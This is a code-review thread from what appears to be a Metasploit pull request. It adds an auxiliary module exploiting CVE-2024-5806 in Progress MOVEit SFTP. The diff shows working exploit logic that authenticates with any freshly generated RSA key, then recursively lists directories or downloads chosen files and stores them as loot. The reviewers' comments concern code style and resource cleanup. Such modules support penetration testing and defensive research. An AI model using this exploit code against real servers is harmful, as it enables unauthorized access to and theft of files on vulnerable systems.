modules/auxiliary/gather/progress_moveit_sftp_fileread_cve_2024_5806.rb

```diff
@@ -0,0 +1,203 @@
+    # back a valid SFTP session which we can interact with.
+    ::Net::SFTP.start(
+      datastore['RHOST'],
+      datastore['TARGETUSER'],
+      {
+        port: datastore['RPORT'],
+        auth_methods: ['publickey'],
+        # The vulnerability allows us to supply any well formed RSA key and it will be accepted. So we generate a new
+        # key (in PEM format) every time we exploit the vulnerability.
+        key_data: [OpenSSL::PKey::RSA.new(2048).to_pem],
+        # Use self as a proxy for the net/ssh library, to allow us to use Metasploit's Rex sockets, which will honor pivots.
+        proxy: self
+      }
+    ) do |sftp|
+      if File.directory? datastore['TARGETFILE']
+        print_status("Listing directory: #{datastore['TARGETFILE']}")
+
+        recurse_dir(sftp, datastore['TARGETFILE'])
+      else
+        print_status("Downloading file: #{datastore['TARGETFILE']}")
+
+        read_file(sftp, datastore['TARGETFILE'])
+      end
+    end
+  rescue ::Net::SFTP::StatusException
+    print_error('SFTP Status Exception.')
+  rescue ::Net::SSH::AuthenticationFailed
+    print_error('SFTP Authentication Failed. Is TARGETUSER a valid username?')
+  rescue ::Rex::ConnectionRefused
+    print_error('SFTP Connection Refused.')
+  rescue ::Rex::HostUnreachable
+    print_error('SFTP Host Unreachable.')
+  rescue ::Rex::ConnectionTimeout, ::Net::SSH::ConnectionTimeout
+    print_error('SFTP Connection Timeout.')
+  ensure
+    ::Net::SSH::Authentication::Methods::Publickey.send(:alias_method, :build_request, :orig_build_request)
+  end
+
+  def recurse_dir(sftp, base_path)
+    sftp.dir.foreach(base_path) do |entry|
+      entry_full_path = base_path.dup
+      entry_full_path << '/' unless base_path.end_with? '/'
+      entry_full_path << entry.name
+      entry_full_path << '/' if entry.directory?
+
+      print_line(entry.longname.gsub(entry.name, entry_full_path))
+
+      recurse_dir(sftp, entry_full_path) if entry.directory?
+    end
+  end
+
+  def read_file(sftp, file_path)
+    sftp.open(file_path) do |open_response|
+      if open_response.ok?
+        file_size = sftp.fstat!(open_response[:handle]).size
+
+        sftp.read(open_response[:handle], 0, file_size) do |read_response|
+          if read_response.ok?
+
+            file_data = read_response[:data].to_s
+
+            if datastore['STORE_LOOT']
+              print_status('Storing the file data to loot...')
+
+              store_loot(
+                file_path,
+                file_data.ascii_only? ? 'text/plain' : 'application/octet-stream',
+                datastore['RHOST'],
+                file_data,
+                datastore['TARGETFILE'],
+                'File read from Progress MOVEit SFTP server'
+              )
+            else
+              print_line(file_data)
+            end
+
+          else
+            print_error('SFTP read failed.')
+          end
```

Comment:
Do you think we could avoid having long if/else block to increase readability? We usually prefer returning early and avoid too much nested blocks.

Something along these lines (untested):
```ruby
    sftp.open(file_path) do |open_response|
      unless open_response.ok?
        print_error('SFTP open failed. Is the TARGETFILE path correct?')
        return
      end

      file_size = sftp.fstat!(open_response[:handle]).size

      sftp.read(open_response[:handle], 0, file_size) do |read_response|
        unless read_response.ok?
          print_error('SFTP read failed.')
          next
        end
        ...
```

Note that maybe the `#close` call would need to be added to an `ensure` block at the end to make sure it is always called?

Reply:
`close` is now called in an `ensure` block as suggested (commit [9d5ea1f](https://github.com/rapid7/metasploit-framework/pull/19295/commits/9d5ea1f2b738ffc0a1a6048a1e70b3d179a951fa)[9d5ea1f](https://github.com/rapid7/metasploit-framework/pull/19295/commits/9d5ea1f2b738ffc0a1a6048a1e70b3d179a951fa))

Reply:
Yup, using your suggestion above, I reduced the nesting in `read_file` by 2 levels via commit [cb3966d](https://github.com/rapid7/metasploit-framework/pull/19295/commits/cb3966da7f177fadf1f9e5a922c0e1941fe5f71d)